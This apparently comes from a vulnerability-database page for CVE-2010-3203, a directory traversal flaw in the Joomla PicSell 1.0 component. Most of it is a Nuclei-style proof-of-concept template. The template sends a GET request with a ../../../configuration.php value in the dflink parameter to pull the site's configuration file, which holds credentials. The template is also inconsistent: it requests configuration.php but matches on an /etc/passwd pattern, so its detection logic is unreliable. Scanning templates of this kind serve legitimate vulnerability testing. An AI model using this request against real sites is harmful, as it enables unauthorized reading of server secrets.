CVE-2010-3203: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval

日期: 2025-08-01 | 影响软件: Joomla Component PicSell 1.0 | POC: 已公开

漏洞描述

A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.

PoC代码[已公开]

id: CVE-2010-3203

info:
  name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to retrieve arbitrary files from the server.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/14845
    - https://nvd.nist.gov/vuln/detail/CVE-2010-3203
    - http://web.archive.org/web/20150105095919/http://secunia.com:80/advisories/41187/
    - http://www.exploit-db.com/exploits/14845
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-3203
    cwe-id: CWE-22
    epss-score: 0.03351
    epss-percentile: 0.86856
    cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: xmlswf
    product: com_picsell
  tags: cve,cve2010,edb,joomla,lfi,xmlswf

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022056a2883a1efd7666d495b1ed7d7646479cd4d2b6c07e2ebdec732c3deedca9f202207df955676b11d5c76ffc9c732252ff6911afff0d8e66b857132a6a93fc515f97:922c64590222798bb761d5b6d8e72950

相关漏洞推荐